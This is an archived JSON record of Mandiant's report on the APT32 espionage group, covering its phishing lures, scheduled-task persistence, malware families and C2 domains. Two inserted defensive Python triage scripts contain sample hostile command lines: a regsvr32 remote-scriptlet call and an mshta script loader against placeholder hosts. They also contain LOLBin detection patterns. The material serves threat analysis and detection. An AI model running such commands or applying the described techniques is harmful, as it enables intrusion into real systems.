{
	"id": "a7533052-9a64-4da5-9f00-7daaf4f84fe6",
	"created_at": "2026-04-06T00:21:35.983104Z",
	"updated_at": "2026-04-10T13:12:15.037459Z",
	"deleted_at": null,
	"sha1_hash": "272dc619d21855eb7060799ac46c95d910de76dc",
	"title": "Cyber Espionage is Alive and Well: APT32 and the Threat to Global Corporations | Mandiant",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 919211,
	"plain_text": "Cyber Espionage is Alive and Well: APT32 and the Threat to Global Corporations | Mandiant\r\nBy Mandiant\r\nPublished: 2017-05-14 · Archived: 2026-04-05 15:34:14 UTC\r\nCyber espionage actors, now designated by FireEye as APT32 (OceanLotus Group), are carrying out intrusions into private sector companies across multiple industries and have also targeted foreign governments, dissidents, and journalists. FireEye assesses that APT32 leverages a unique suite of fully-featured malware, in conjunction with commercially-available tools, to conduct targeted operations that are aligned with Vietnamese state interests.\r\nAPT32 and FireEye’s Community Response\r\nIn the course of investigations into intrusions at several corporations with business interests in Vietnam, FireEye’s Mandiant incident response consultants uncovered activity and attacker-controlled infrastructure indicative of a significant intrusion campaign. In March 2017, in response to active targeting of FireEye clients, the team launched a Community Protection Event (CPE) – a coordinated effort between Mandiant incident responders, FireEye as a Service (FaaS), FireEye iSight Intelligence, and FireEye product engineering – to protect all clients from APT32 activity.\r\nIn the following weeks, FireEye released threat intelligence products and updated malware profiles to customers while developing new detection techniques for APT32’s tools and phishing lures. 
This focused intelligence and detection effort led to new external victim identifications as well as providing sufficient technical evidence to link twelve prior intrusions, consolidating four previously unrelated clusters of threat actor activity into FireEye’s newest named advanced persistent threat group: APT32.\r\nAPT32 Targeting of Private Sector Company Operations in Southeast Asia\r\nSince at least 2014, FireEye has observed APT32 targeting foreign corporations with a vested interest in Vietnam’s manufacturing, consumer products, and hospitality sectors. Furthermore, there are indications that APT32 actors are targeting peripheral network security and technology infrastructure corporations.\r\nHere is an overview of intrusions investigated by FireEye that are attributed to APT32:\r\nIn 2014, a European corporation was compromised prior to constructing a manufacturing facility in Vietnam.\r\nIn 2016, Vietnamese and foreign-owned corporations working in network security, technology infrastructure, banking, and media industries were targeted.\r\nIn mid-2016, malware that FireEye believes to be unique to APT32 was detected on the networks of a global hospitality industry developer with plans to expand operations into Vietnam.\r\nhttps://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html\r\nPage 1 of 12\r\nFrom 2016 through 2017, two subsidiaries of U.S. 
and Philippine consumer products corporations, located inside Vietnam, were the target of APT32 intrusion operations.\r\nTable 1 shows a breakdown of APT32 activity, including the malware families used in each.\r\nYear | Country | Industry | Malware\r\n2014 | Vietnam | Network Security | WINDSHIELD\r\n2014 | Germany | Manufacturing | WINDSHIELD\r\n2015 | Vietnam | Media | WINDSHIELD\r\n2016 | Philippines | Consumer Products | KOMPROGO, WINDSHIELD, SOUNDBITE, BEACON\r\n2016 | Vietnam | Banking | WINDSHIELD\r\n2016 | Philippines | Technology Infrastructure | WINDSHIELD\r\n2016 | China | Hospitality | WINDSHIELD\r\n2016 | Vietnam | Media | WINDSHIELD\r\n2016 | United States | Consumer Products | WINDSHIELD, PHOREAL, BEACON, SOUNDBITE\r\nTable 1: APT32 Private Sector Targeting Identified by FireEye\r\nAPT32 Interest in Political Influence and Foreign Governments\r\nIn addition to focused targeting of the private sector with ties to Vietnam, APT32 has also targeted foreign governments, as well as Vietnamese dissidents and journalists, since at least 2013. Here is an overview of this activity:\r\nA public blog published by the Electronic Frontier Foundation indicated that journalists, activists, dissidents, and bloggers were targeted in 2013 by malware and tactics consistent with APT32 operations.\r\nIn 2014, APT32 leveraged a spear-phishing attachment titled “Plans to crackdown on protesters at the Embassy of Vietnam.exe”, which targeted dissident activity among the Vietnamese diaspora in Southeast Asia. Also in 2014, APT32 carried out an intrusion against a Western country’s national legislature.\r\nIn 2015, SkyEye Labs, the security research division of the Chinese firm Qihoo 360, released a report detailing threat actors that were targeting Chinese public and private entities including government agencies, research institutes, maritime agencies, sea construction, and shipping enterprises. 
The information included in the report indicated that the perpetrators used the same malware, overlapping infrastructure, and similar targets as APT32.\r\nIn 2015 and 2016, two Vietnamese media outlets were targeted with malware that FireEye assesses to be unique to APT32.\r\nIn 2017, social engineering content in lures used by the actor provided evidence that they were likely used to target members of the Vietnam diaspora in Australia as well as government employees in the Philippines.\r\nAPT32 Tactics\r\nIn their current campaign, APT32 has leveraged ActiveMime files that employ social engineering methods to entice the victim into enabling macros. Once the macros run, the document downloads multiple malicious payloads from remote servers. APT32 actors continue to deliver the malicious attachments via spear-phishing emails.\r\nAPT32 actors designed multilingual lure documents which were tailored to specific victims. Although the files had “.doc” file extensions, the recovered phishing lures were ActiveMime “.mht” web page archives that contained text and images. 
These files were likely created by exporting Word documents into single file web pages.\r\nTable 2 contains a sample of recovered APT32 multilingual lure files.\r\nActiveMime Lure File | Translation | MD5\r\n2017年员工工资性津贴额统计报告.doc | 2017 Statistical Report on Staff Salary and Allowances | 5458a2e4d784abb1a1127263bd5006b5\r\nThong tin.doc | Information | ce50e544430e7265a45fab5a1f31e529\r\nPhan Vu Tutn CV.doc | – | 4f761095ca51bfbbf4496a4964e41d4f\r\nKe hoach cuu tro nam 2017.doc | 2017 Relief Plan | e9abe54162ba4572c770ab043f576784\r\nInstructions to GSIS.doc | – | fba089444c769700e47c6b44c362f96b\r\nHoi thao truyen thong doc lap.doc | Independent Media Workshop | f6ee4b72d6d42d0c7be9172be2b817c1\r\nGiấy yêu cầu bồi thường mới 2016 - hằng.doc | New 2016 Claim Form | aa1f85de3e4d33f31b4f78968b29f175\r\nHoa don chi tiet tien no.doc | Debt Details | 5180a8d9325a417f2d8066f9226a5154\r\nThu moi tham du Hoi luan.doc | Invitation to Attend a Discussion Forum | f6ee4b72d6d42d0c7be9172be2b817c1\r\nDanh sach nhan vien vi pham ky luat.doc | List of Employee Violations | 6baafffa7bf960dec821b627f9653e44\r\nNội-dung-quảng-cáo.doc | Advertising Content | 471a2e7341f2614b715dc89e803ffcac\r\nHĐ DVPM-VTC 31.03.17.doc | – | f1af6bb36cdf3cff768faee7919f0733\r\nTable 2: Sampling of APT32 Lure Files\r\nThe Base64 encoded ActiveMime data also contained an OLE file with malicious macros. When opened, many lure files displayed fake error messages in an attempt to trick users into launching the malicious macros. Figure 1 shows a fake Gmail theme paired with a hexadecimal error code that encourages the recipient to enable content to resolve the error. 
Figure 2 displays another APT32 lure that used a convincing image of a fake Windows error message instructing the recipient to enable content to properly display document font characters.\r\nFigure 1: Example APT32 Phishing Lure – Fake Gmail Error Message\r\nFigure 2: Example APT32 Phishing Lure – Fake Text Encoding Error Message\r\nAPT32 operators implemented several novel techniques to track the efficacy of their phishing, monitor the distribution of their malicious documents, and establish persistence mechanisms to dynamically update backdoors injected into memory.\r\nIn order to track who opened the phishing emails, viewed the links, and downloaded the attachments in real time, APT32 used cloud-based email analytics software designed for sales organizations. In some instances, APT32 abandoned direct email attachments altogether and relied exclusively on this tracking technique with links to their ActiveMime lures hosted externally on legitimate cloud storage services.\r\nTo enhance visibility into the further distribution of their phishing lures, APT32 utilized the native web page functionality of their ActiveMime documents to link to external images hosted on APT32-monitored infrastructure.\r\nFigure 3 contains an example phishing lure with HTML image tags used for additional tracking by APT32.\r\nFigure 3: Phishing Lure Containing HTML Image Tags for Additional Tracking\r\nWhen a document with this feature is opened, Microsoft Word will attempt to download the external image, even if macros were disabled. In all phishing lures analyzed, the external images did not exist. Mandiant consultants suspect that APT32 was monitoring web logs to track the public IP address used to request remote images. 
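Both features of these lures, the macro-bearing OLE part inside the ActiveMime archive and the remote image reference that doubles as an open-tracking beacon, can be checked for offline. The Python script below is an added example, not code from the original post or from FireEye. It parses a constructed .mht lure (the MIME boundary, the images.example.test host and the minimal OLE-like blob are assumptions, not the APT32 samples), inflates the ActiveMime part, looks for VBA stream names, and lists the external image URLs that Word would request when it renders the page.

```python
# Added example, not code from the original post: triage an ActiveMime .mht
# lure that was renamed to .doc. It checks for the two features described
# above, a base64 application/x-mso part wrapping an OLE file with VBA macro
# streams and remote <img> references that act as open-tracking beacons.
# The sample lure, host names and the minimal OLE-like blob are constructed.
import base64
import email
import zlib
from email import policy
from html.parser import HTMLParser

OLE_MAGIC = bytes.fromhex('d0cf11e0a1b11ae1')
# OLE stream names are stored as UTF-16LE; the ASCII fragment Attribut is the
# start of a compressed VBA module header, the same marker olevba keys on.
MACRO_MARKERS = [
    '_VBA_PROJECT'.encode('utf-16-le'),
    'Macros'.encode('utf-16-le'),
    b'Attribut',
]


class RemoteImages(HTMLParser):
    # Collects <img src=...> values that point at external hosts; Word fetches
    # these when it renders the page, even with macros disabled.
    def __init__(self):
        super().__init__()
        self.urls = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != 'img':
            return
        for name, value in attrs:
            if name.lower() == 'src' and value and value.lower().startswith(('http://', 'https://')):
                self.urls.append(value)


def inflate_activemime(blob):
    # An editdata.mso part is the ActiveMime magic, a short header and a zlib
    # stream. Try each plausible zlib header position after the magic instead
    # of trusting a fixed offset; non-ActiveMime input is returned unchanged
    # so a plain OLE part goes through the same checks.
    if not blob.startswith(b'ActiveMime'):
        return blob
    for i in range(10, min(len(blob) - 1, 256)):
        if blob[i] == 0x78 and blob[i + 1] in (0x01, 0x5E, 0x9C, 0xDA):
            try:
                return zlib.decompressobj().decompress(blob[i:])
            except zlib.error:
                continue
    return b''


def triage_mht(raw):
    # Walks every MIME part of the lure and returns the indicators found.
    msg = email.message_from_bytes(raw, policy=policy.default)
    result = {'remote_images': [], 'ole_parts': 0, 'has_macros': False}
    for part in msg.walk():
        if part.is_multipart():
            continue
        payload = part.get_payload(decode=True) or b''
        ctype = part.get_content_type()
        if ctype == 'text/html':
            collector = RemoteImages()
            collector.feed(payload.decode('utf-8', 'replace'))
            result['remote_images'].extend(collector.urls)
        elif ctype == 'application/x-mso' or payload.startswith(b'ActiveMime'):
            ole = inflate_activemime(payload)
            if ole.startswith(OLE_MAGIC):
                result['ole_parts'] += 1
                if any(marker in ole for marker in MACRO_MARKERS):
                    result['has_macros'] = True
    result['suspicious'] = result['has_macros'] or bool(result['remote_images'])
    return result


def build_sample_lure():
    # Constructed stand-in for a Word single-file web page export: an HTML body
    # with a tracking image plus an ActiveMime part around a minimal OLE-looking
    # blob (magic, padding, VBA stream names). A real export carries a complete
    # compound file here; the checks above are the same.
    fake_ole = OLE_MAGIC + bytes(504) + MACRO_MARKERS[0] + bytes(16) + b'Attribut'
    mso = b'ActiveMime' + bytes(40) + zlib.compress(fake_ole)
    mso_b64 = base64.encodebytes(mso).decode('ascii')
    return ('''MIME-Version: 1.0
Content-Type: multipart/related; boundary=NextPart01D2C4A78E1F3A20

--NextPart01D2C4A78E1F3A20
Content-Type: text/html; charset=utf-8
Content-Transfer-Encoding: 7bit
Content-Location: file:///C:/Users/victim/Thong%20tin.htm

<html><body><p>Enable content to view this document.</p>
<img src='http://images.example.test/track/aa1f.gif' width='1' height='1'>
</body></html>

--NextPart01D2C4A78E1F3A20
Content-Type: application/x-mso
Content-Transfer-Encoding: base64
Content-Location: file:///C:/Users/victim/Thong%20tin_files/editdata.mso

''' + mso_b64 + '''
--NextPart01D2C4A78E1F3A20--
''').encode('utf-8')
```

Run it against a recovered attachment with triage_mht(open(path, 'rb').read()). A .doc whose first bytes are MIME-Version: or From: rather than the OLE magic is itself worth flagging, since a genuine Word binary document never starts with MIME text; the remote image check is the one that fires even when the macro never runs, which is exactly why the actor used it for tracking.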
Combining the image beacons with the email tracking software let APT32 closely track phishing delivery and success rate, conduct further analysis of victim organizations, and monitor the interest of security firms.\r\nOnce macros were enabled on the target system, the malicious macros created two named scheduled tasks as persistence mechanisms for two backdoors on the infected system. The first named scheduled task launched an application whitelisting script protection bypass to execute a COM scriptlet that dynamically downloaded the first backdoor from APT32’s infrastructure and injected it into memory. The second named scheduled task, loaded as an XML file to falsify task attributes, ran a JavaScript code block that downloaded and launched a secondary backdoor, delivered as a multi-stage PowerShell script. In most lures, one scheduled task persisted an APT32-specific backdoor and the other scheduled task initialized a commercially-available backdoor as backup.\r\nTo illustrate the complexity of these lures, Figure 4 shows the creation of persistence mechanisms for recovered APT32 lure “2017年员工工资性津贴额统计报告.doc”.\r\nFigure 4: APT32 ActiveMime Lures Create Two Named Scheduled Tasks\r\nIn this example, a scheduled task named “Windows Scheduled Maintenance” was created to run Casey Smith’s “Squiblydoo” application whitelisting bypass (regsvr32.exe loading a remote scriptlet through scrobj.dll) every 30 minutes. While all payloads can be dynamically updated, at the time of delivery this task launched a COM scriptlet (“.sct” file extension) that downloaded and executed Meterpreter hosted on images.chinabytes[.]info. Meterpreter then loaded Cobalt Strike BEACON, configured to communicate with 80.255.3[.]87 using the Safebrowsing malleable C2 profile to further blend in with network traffic. 
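The two scheduled tasks in this lure (the regsvr32 Squiblydoo task above and the mshta task described next) leave a compact set of artifacts on the host: a LOLBin command line, a short repetition interval, a RegistrationInfo date that can be set to any value when the task is registered from XML, and a task name that may carry hidden characters. The Python script below is an added example, not code from the original post, from FireEye or from Microsoft. The task definitions, names, URLs and timestamps in it are constructed, and the creation time of the task file is passed in as a parameter rather than read from C:/Windows/System32/Tasks so that the example runs offline.

```python
# Added example, not code from the original post: triage Windows scheduled task
# XML for the persistence pattern described above. Flags LOLBin Exec actions
# (regsvr32 with a remote scriptlet, mshta, PowerShell download cradles), short
# repetition intervals, a RegistrationInfo date that predates the task file on
# disk (the backdating trick), and task names carrying non-printing or non-ASCII
# whitespace characters (the same check applies to service and DLL names).
# All task definitions, names, URLs and timestamps here are constructed.
import ntpath
import unicodedata
import xml.etree.ElementTree as ET
from datetime import datetime, timedelta

TASK_NS = 'http://schemas.microsoft.com/windows/2004/02/mit/task'
# Argument substrings that, for these binaries, indicate remote code loading.
LOLBIN_PATTERNS = {
    'regsvr32': ('/i:http', 'scrobj.dll'),
    'mshta': ('http', 'javascript:', 'vbscript:'),
    'powershell': ('downloadstring', 'iex', 'invoke-expression', 'frombase64string'),
}


def local(tag):
    # Task XML elements are namespaced; compare on the local name only.
    return tag.rsplit('}', 1)[-1]


def hidden_characters(name):
    # Control and format characters (category C*) and any separator other than
    # a plain space (U+00A0 no-break space, U+2002 en space, ...) as U+XXXX.
    return ['U+%04X' % ord(ch) for ch in name
            if unicodedata.category(ch)[0] == 'C'
            or (unicodedata.category(ch)[0] == 'Z' and ch != ' ')]


def duration_minutes(text):
    # Parses the ISO 8601 durations Task Scheduler writes (PT30M, PT1H, P1D).
    total, number, in_time = 0.0, '', False
    for ch in text.upper():
        if ch == 'P':
            continue
        if ch == 'T':
            in_time = True
        elif ch.isdigit() or ch == '.':
            number += ch
        else:
            value, number = float(number or 0), ''
            if ch == 'D':
                total += value * 1440
            elif ch == 'H':
                total += value * 60
            elif ch == 'M' and in_time:
                total += value
            elif ch == 'S':
                total += value / 60
    return total


def triage_task(task_name, task_xml, file_created):
    # file_created is the creation time of the task file under System32/Tasks,
    # passed in so the example runs offline. Returns a list of findings.
    findings = []
    for el in ET.fromstring(task_xml).iter():
        name = local(el.tag)
        if name == 'Exec':
            fields = {local(c.tag): (c.text or '').strip() for c in el}
            exe = ntpath.basename(fields.get('Command', '')).lower()
            exe = exe[:-4] if exe.endswith('.exe') else exe
            if any(n in fields.get('Arguments', '').lower() for n in LOLBIN_PATTERNS.get(exe, ())):
                findings.append('lolbin action: %s %s' % (exe, fields.get('Arguments', '')))
        elif name == 'Interval' and el.text and duration_minutes(el.text) <= 60:
            findings.append('short repetition interval: %s' % el.text.strip())
        elif name == 'RegistrationInfo':
            for c in el:
                if local(c.tag) == 'Date' and c.text:
                    # Keep seconds only; Task Scheduler may write 7 fractional digits.
                    claimed = datetime.fromisoformat(c.text.strip()[:19])
                    if file_created - claimed > timedelta(days=1):
                        findings.append('registration date %s predates file creation %s'
                                        % (claimed.date(), file_created.date()))
    hidden = hidden_characters(task_name)
    if hidden:
        findings.append('hidden characters in task name: %s' % ', '.join(hidden))
    return findings


def sample_task(date, interval, command, arguments):
    # Minimal task definition in the Task Scheduler 1.2 schema (constructed).
    return '''<Task version='1.2' xmlns='%s'>
  <RegistrationInfo><Date>%s</Date><Author>SYSTEM</Author></RegistrationInfo>
  <Triggers><TimeTrigger><StartBoundary>2017-03-20T08:00:00</StartBoundary>
    <Repetition><Interval>%s</Interval></Repetition></TimeTrigger></Triggers>
  <Actions Context='Author'><Exec><Command>%s</Command><Arguments>%s</Arguments></Exec></Actions>
</Task>''' % (TASK_NS, date, interval, command, arguments)


def triage_samples():
    # Two registrations mimicking the lure (registered from XML with a backdated
    # date, 30/50-minute repetition, LOLBin actions, one with a no-break space
    # appended to its name) and one benign task for contrast.
    file_created = datetime(2017, 3, 20, 8, 5, 0)
    tasks = {
        'Windows Scheduled Maintenance': sample_task(
            '2016-06-02T09:14:00', 'PT30M', 'regsvr32.exe',
            '/s /n /u /i:http://images.example.test/update.sct scrobj.dll'),
        'Scheduled Defrags' + chr(0xA0): sample_task(
            '2016-06-02T09:14:00', 'PT50M', 'mshta.exe',
            '''javascript:a=GetObject('script:http://share.example.test/k.sct');close();'''),
        'Disk Cleanup': sample_task('2017-03-20T08:04:30', 'P1D', 'defrag.exe', 'C: /O'),
    }
    return {name: triage_task(name, xml, file_created) for name, xml in tasks.items()}
```

On a live host, feed triage_task the XML returned by Export-ScheduledTask (or the task files under the Tasks directory) and take file_created from the creation time of the corresponding file; a claimed registration date far older than the file is the backdating this post describes, and hidden_characters applied to service names from the registry catches the no-break space trick mentioned further down.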
A second scheduled task named “Scheduled Defrags” was created by loading the raw task XML with a backdated task creation timestamp of June 2, 2016. This second task ran “mshta.exe” every 50 minutes, which launched an APT32-specific backdoor delivered as shellcode in a PowerShell script, configured to communicate with the domains blog.panggin[.]org, share.codehao[.]net, and yii.yiihao126[.]net.\r\nFigure 5 illustrates the chain of events for a single successful APT32 phishing lure that dynamically injects two multi-stage malware frameworks into memory.\r\nFigure 5: APT32 Phishing Chain of Events\r\nThe impressive APT32 operations did not stop after they established a foothold in victim environments. Several Mandiant investigations revealed that, after gaining access, APT32 regularly cleared select event log entries and heavily obfuscated their PowerShell-based tools and shellcode loaders with Daniel Bohannon’s Invoke-Obfuscation framework.\r\nAPT32 regularly used stealthy techniques to blend in with legitimate user activity:\r\nDuring one investigation, APT32 was observed using a privilege escalation exploit (CVE-2016-7255) masquerading as a Windows hotfix.\r\nIn another investigation, APT32 compromised the McAfee ePO infrastructure to distribute their malware as a software deployment task in which all systems pulled the payload from the ePO server using the proprietary SPIPE protocol.\r\nAPT32 also used hidden or non-printing characters to help visually camouflage their malware on a system. For example, APT32 installed one backdoor as a persistent service with a legitimate service name that had a Unicode no-break space character appended to it. 
Another backdoor used an otherwise legitimate DLL filename padded with a non-printing OS command control code.\r\nAPT32 Malware and Infrastructure\r\nAPT32 appears to have a well-resourced development capability and uses a custom suite of backdoors spanning multiple protocols. APT32 operations are characterized through deployment of signature malware payloads including WINDSHIELD, KOMPROGO, SOUNDBITE, and PHOREAL. APT32 often deploys these backdoors along with the commercially-available Cobalt Strike BEACON backdoor. APT32 may also possess backdoor development capabilities for macOS.\r\nThe capabilities of this unique suite of malware are shown in Table 3.\r\nMalware | Capabilities\r\nWINDSHIELD | Command and control (C2) communications via TCP raw sockets; four configured C2s and six configured ports, with the C2/port pair chosen at random for each connection; registry manipulation; retrieving the current module’s file name; gathering system information including registry values, user name, computer name, and current code page; file system interaction including directory creation, file deletion, and reading and writing files; loading additional modules and executing code; terminating processes; anti-disassembly\r\nKOMPROGO | Fully-featured backdoor capable of process, file, and registry management; creating a reverse shell; file transfers; running WMI queries; retrieving information about the infected system\r\nSOUNDBITE | C2 communications via DNS; process creation; file upload; shell command execution; file and directory enumeration/manipulation; window enumeration; registry manipulation; system information gathering\r\nPHOREAL | C2 communications via ICMP; reverse shell creation; filesystem manipulation; registry manipulation; process creation; file upload\r\nBEACON (Cobalt Strike) | Publicly available payload that can inject and execute arbitrary code into processes; impersonating the security context of users; importing Kerberos tickets; uploading and downloading files; executing shell commands; configured with malleable C2 profiles to blend in with normal network traffic; co-deployment and interoperability with the Metasploit framework; SMB named pipe in-memory backdoor payload that enables peer-to-peer C2 and pivoting over SMB\r\nTable 3: APT32 Malware and Capabilities\r\nAPT32 operators appear to be well-resourced and supported, as they use a large set of domains and IP addresses as command and control infrastructure. The FireEye iSIGHT Intelligence MySIGHT Portal contains additional information on these backdoor families based on Mandiant investigations of APT32 intrusions.\r\nFigure 6 provides a summary of APT32 tools and techniques mapped to each stage of the attack lifecycle.\r\nFigure 6: APT32 Attack Lifecycle\r\nOutlook and Implications\r\nBased on incident response investigations, product detections, and intelligence observations, along with additional publications on the same operators, FireEye assesses that APT32 is a cyber espionage group aligned with Vietnamese government interests. The targeting of private sector interests by APT32 is notable and FireEye believes the actor poses significant risk to companies doing business in, or preparing to invest in, the country. While the motivation for each APT32 private sector compromise varied – and in some cases was unknown – the unauthorized access could serve as a platform for law enforcement, intellectual property theft, or anticorruption measures that could ultimately erode the competitive advantage of targeted organizations. 
Furthermore, APT32 continues to threaten political activism and free speech in Southeast Asia and the public sector worldwide. Governments, journalists, and members of the Vietnam diaspora may continue to be targeted.\r\nWhile actors from China, Iran, Russia, and North Korea remain the most active cyber espionage threats tracked and responded to by FireEye, APT32 reflects a growing host of new countries that have adopted this dynamic capability. APT32 demonstrates how accessible and impactful offensive capabilities can be with the proper investment and the flexibility to embrace newly-available tools and techniques. As more countries utilize inexpensive and efficient cyber operations, there is a need for public awareness of these threats and renewed dialogue around emerging nation-state intrusions that go beyond public sector and intelligence targets.\r\nAPT32 Detection\r\nFigure 7 contains a Yara rule that can be used to identify malicious macros associated with APT32’s phishing lures:\r\nFigure 7: Yara Rule for APT32 Malicious Macros\r\nTable 4 contains a sampling of the infrastructure that FireEye has associated with APT32 C2.\r\nC2 Infrastructure\r\n103.53.197.202\r\n104.237.218.70\r\n104.237.218.72\r\n185.157.79.3\r\n193.169.245.78\r\n193.169.245.137\r\n23.227.196.210\r\n24.datatimes.org\r\n80.255.3.87\r\nblog.docksugs.org\r\nblog.panggin.org\r\ncontay.deaftone.com\r\ncheck.paidprefund.org\r\ndatatimes.org\r\ndocksugs.org\r\neconomy.bloghop.org\r\nemp.gapte.name\r\nfacebook-cdn.net\r\ngap-facebook.com\r\ngl-appspot.org\r\nhelp.checkonl.org\r\nhigh.expbas.net\r\nhigh.vphelp.net\r\nicon.torrentart.com\r\nimages.chinabytes.info\r\nimaps.qki6.com\r\nimg.fanspeed.net\r\njob.supperpow.com\r\nlighpress.info\r\nmenmin.strezf.com\r\nmobile.pagmobiles.info\r\nnews.lighpress.info\r\nnotificeva.com\r\nnsquery.net\r\npagmobiles.info\r\npaidprefund.org\r\npush.relasign.org\r\nrelasign.org\r\nshare.codehao.net\r\nseri.volveri.net\r\nssl.zin0.com\r\nstatic.jg7.org\r\nsyn.timeizu.net\r\nteriava.com\r\ntimeizu.net\r\ntonholding.com\r\ntulationeva.com\r\nuntitled.po9z.com\r\nupdate-flashs.com\r\nvieweva.com\r\nvolveri.net\r\nvphelp.net\r\nyii.yiihao126.net\r\nzone.apize.net\r\nTable 4: Sampling of APT32 C2 Infrastructure\r\nPosted in: Threat Intelligence, Security \u0026 Identity\r\nSource: https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA",
		"MISPGALAXY",
		"Malpedia",
		"MITRE"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html"
	],
	"report_names": [
		"cyber-espionage-apt32.html"
	],
	"threat_actors": [
		{
			"id": "af509bbb-8d18-4903-a9bd-9e94099c6b30",
			"created_at": "2023-01-06T13:46:38.585525Z",
			"updated_at": "2026-04-10T02:00:03.030833Z",
			"deleted_at": null,
			"main_name": "APT32",
			"aliases": [
				"OceanLotus",
				"ATK17",
				"G0050",
				"APT-C-00",
				"APT-32",
				"Canvas Cyclone",
				"SeaLotus",
				"Ocean Buffalo",
				"OceanLotus Group",
				"Cobalt Kitty",
				"Sea Lotus",
				"APT 32",
				"POND LOACH",
				"TIN WOODLAWN",
				"Ocean Lotus"
			],
			"source_name": "MISPGALAXY:APT32",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "870f6f62-84f5-48ca-a18e-cf2902cd6924",
			"created_at": "2022-10-25T15:50:23.303818Z",
			"updated_at": "2026-04-10T02:00:05.301184Z",
			"deleted_at": null,
			"main_name": "APT32",
			"aliases": [
				"APT32",
				"SeaLotus",
				"OceanLotus",
				"APT-C-00",
				"Canvas Cyclone"
			],
			"source_name": "MITRE:APT32",
			"tools": [
				"Mimikatz",
				"ipconfig",
				"Kerrdown",
				"Cobalt Strike",
				"SOUNDBITE",
				"OSX_OCEANLOTUS.D",
				"KOMPROGO",
				"netsh",
				"RotaJakiro",
				"PHOREAL",
				"Arp",
				"Denis",
				"Goopy"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "5da6b5fd-1955-412a-81aa-069fb50b6e31",
			"created_at": "2025-08-07T02:03:25.116085Z",
			"updated_at": "2026-04-10T02:00:03.668978Z",
			"deleted_at": null,
			"main_name": "TIN WOODLAWN",
			"aliases": [
				"APT32 ",
				"Cobalt Kitty",
				"OceanLotus",
				"WOODLAWN "
			],
			"source_name": "Secureworks:TIN WOODLAWN",
			"tools": [
				"Cobalt Strike",
				"Denis",
				"Goopy",
				"JEShell",
				"KerrDown",
				"Mimikatz",
				"Ratsnif",
				"Remy",
				"Rizzo",
				"RolandRAT"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "2439ad53-39cc-4fff-8fdf-4028d65803c0",
			"created_at": "2022-10-25T16:07:23.353204Z",
			"updated_at": "2026-04-10T02:00:04.55407Z",
			"deleted_at": null,
			"main_name": "APT 32",
			"aliases": [
				"APT 32",
				"APT-C-00",
				"APT-LY-100",
				"ATK 17",
				"G0050",
				"Lotus Bane",
				"Ocean Buffalo",
				"OceanLotus",
				"Operation Cobalt Kitty",
				"Operation PhantomLance",
				"Pond Loach",
				"SeaLotus",
				"SectorF01",
				"Tin Woodlawn"
			],
			"source_name": "ETDA:APT 32",
			"tools": [
				"Agentemis",
				"Android.Backdoor.736.origin",
				"AtNow",
				"Backdoor.MacOS.OCEANLOTUS.F",
				"BadCake",
				"CACTUSTORCH",
				"CamCapture Plugin",
				"CinaRAT",
				"Cobalt Strike",
				"CobaltStrike",
				"Cuegoe",
				"DKMC",
				"Denis",
				"Goopy",
				"HiddenLotus",
				"KOMPROGO",
				"KerrDown",
				"METALJACK",
				"MSFvenom",
				"Mimikatz",
				"Nishang",
				"OSX_OCEANLOTUS.D",
				"OceanLotus",
				"PHOREAL",
				"PWNDROID1",
				"PhantomLance",
				"PowerSploit",
				"Quasar RAT",
				"QuasarRAT",
				"RatSnif",
				"Remy",
				"Remy RAT",
				"Rizzo",
				"Roland",
				"Roland RAT",
				"SOUNDBITE",
				"Salgorea",
				"Splinter RAT",
				"Terracotta VPN",
				"Yggdrasil",
				"cobeacon",
				"denesRAT",
				"fingerprintjs2"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434895,
	"ts_updated_at": 1775826735,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/272dc619d21855eb7060799ac46c95d910de76dc.pdf",
		"text": "https://archive.orkl.eu/272dc619d21855eb7060799ac46c95d910de76dc.txt",
		"img": "https://archive.orkl.eu/272dc619d21855eb7060799ac46c95d910de76dc.jpg"
	}
}